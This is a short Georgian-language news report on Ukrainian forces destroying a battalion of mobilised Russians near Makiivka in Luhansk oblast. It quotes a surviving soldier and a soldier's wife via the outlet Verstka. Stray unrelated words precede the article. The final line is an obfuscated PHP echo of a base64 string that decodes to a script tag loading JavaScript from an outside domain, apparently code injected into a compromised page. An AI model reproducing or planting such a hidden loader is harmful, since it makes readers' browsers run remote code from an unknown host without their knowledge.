celsiusi
ავერსი შნაიდერი
ლუგანსკის ოლქის სვატივის რაიონში უკრაინელმა სამხედროებმა ვორონეჟის ოლქიდან მობილიზებული რუსების ბატალიონი გაანადგურეს. ლიკვიდირებულია ასობით ოკუპანტი.
 
როგორც რუსული გამოცემა „ვერსტკა“ გადარჩენილ რუსი ჯარისკაცისა და მობილიზებულთა ახლობლებზე დაყრდნობით წერს, ეს სოფელ მაკიივკასთან მოხდა. რუსი სამხედრო მოსამსახურე ოლექსი აგაფონოვი, გამოცემასთან საუბრისას ვარაუდობს, რომ შესაძლოა ლიკვიდირებულთა რაოდენობა 500-ზე მეტიც იყოს.
 
„დაგვაგდეს სადესანტოებში, გვითხრეს, რომ თხრა დაგვეწყო, თითო ბატალიონს სამი ნიჩაბი გვქონდა, როგორც შეგვეძლო, ამოვთხარეთ . დილით დაიწყო სროლა – არტილერიიდან, ნაღმტყორცნებიდან, ვერტმფრენებიდან, ოფიცრები მაშინვე გაიქცნენ"- განაცხადა აგაფონოვმა.
 
ასობით დაღუპული ოკუპანტის შესახებ გაზეთს ერთ ერთი მობილიზებულის მეუღლემაც დაუდასტურა ინფორმაცია.
 
"დილით დამირეკა სხვისი ნომრიდან და მითხრა რაც მოხდა, თავდაცვითი ხაზის თხრილში ჩააგდეს. ეშინიათ სადმე წასვლის, თუნდაც საგუშაგოებზე გასავლის. ხელმძღვანელობამ მიატოვა ისინი და არ იციან რა გააკეთონ, უბრალოდ დახმარებას ითხოვენ“, - ამბობს ის.
432
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");